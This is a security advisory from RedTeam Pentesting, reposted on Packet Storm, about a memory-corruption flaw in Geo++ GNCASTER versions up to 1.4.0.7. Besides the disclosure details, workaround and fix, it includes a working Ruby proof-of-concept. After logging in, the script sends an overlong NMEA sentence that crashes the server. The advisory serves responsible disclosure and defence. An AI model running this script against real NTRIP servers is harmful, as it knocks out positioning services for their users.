exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Geo++(R) GNCASTER Insecure Handling Of NMEA-Data

Geo++(R) GNCASTER Insecure Handling Of NMEA-Data
Posted Jan 27, 2010
Site redteam-pentesting.de

During a penetration test, RedTeam Pentesting discovered that the GNCaster software does not handle NMEA-data correctly. An attacker that has valid login credentials can use this to crash the server software or potentially execute code on the server. Versions 1.4.0.7 and below are affected.

tags | exploit
SHA-256 | c8321376fc3974e6a79d282a3479efecae9a016d1d25c3ce7e253a9da0f392ad

Geo++(R) GNCASTER Insecure Handling Of NMEA-Data

Change Mirror Download
Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data

During a penetration test, RedTeam Pentesting discovered that the
GNCaster software does not handle NMEA-data correctly. An attacker that
has valid login credentials can use this to crash the server software or
potentially execute code on the server.

Details
=======

Product: Geo++(R) GNCASTER
Affected Versions: <= 1.4.0.7
Fixed Versions: 1.4.0.8
Vulnerability Type: Memory corruption
Security Risk: medium
Vendor URL: http://www.geopp.de
Vendor Status: notified
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-002
Advisory Status: published
CVE: TBA
CVE URL: TBA


Introduction
============

"Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP
is a protocol within RTCM to provide GNSS information via Internet."

(from the vendor's homepage)


More Details
============

After logging in, the GNCaster server software allows the user to
receive data streams. For some of these streams the user can send
so-called NMEA-data to the server to specify the user's geographical
position. If an attacker sends a long data string, the server software
crashes. RedTeam Pentesting believes it is also possible to exploit this
vulnerability to execute code on the server.


Proof of Concept
================

The following ruby script can be used to crash the GNCaster server:

-------------------------------------------------------------------
#!/usr/bin/env ruby
######################################
# #
# RedTeam Pentesting GmbH #
# kontakt@redteam-pentesting.de #
# http://www.redteam-pentesting.de #
# #
######################################

require 'socket'
require 'base64'

if ARGV.length < 3 then
puts "USAGE: %s host:port user:password stream" % __FILE__
puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
puts
exit
end

host, port = ARGV[0].split(':')
pw, stream = ARGV[1..2]

begin
puts "requesting stream %s" % stream.inspect
sock = TCPSocket.new(host, port.to_i)
sock.write("GET %s HTTP/1.1\r\n" % stream)
sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
sock.write("\r\n")

response = sock.readline

puts "server response: %s" % response.inspect

puts "sending modified nmea data"
sock.write("$GP" + "A" * 2000 +
"GGA,134047.00,5005.40000000,N,00839.60000000," +
"E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
puts "done"
end
-------------------------------------------------------------------


Workaround
==========

A vulnerable server could be protected from this vulnerability by an
application layer firewall that filters overly long NMEA-data.


Fix
===

Update GNCASTER to version 1.4.0.8.


Security Risk
=============

As an attacker needs valid user credentials for this attack, the risk of
this vulnerability is regarded as medium. If streams that use NMEA-data
are publicly available, the risk should be considered as high.


History
=======

2009-07-07 Vulnerability identified during a penetration test
2009-07-14 Meeting with customer
2009-12-01 Vendor releases fixed version
2010-01-27 Advisory released


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests, short pentests,
performed by a team of specialised IT-security experts. Hereby, security
weaknesses in company networks or products are uncovered and can be
fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH Tel.: +49 241 963-1300
Dennewartstr. 25-27 Fax : +49 241 963-1304
52068 Aachen http://www.redteam-pentesting.de/
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    35 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close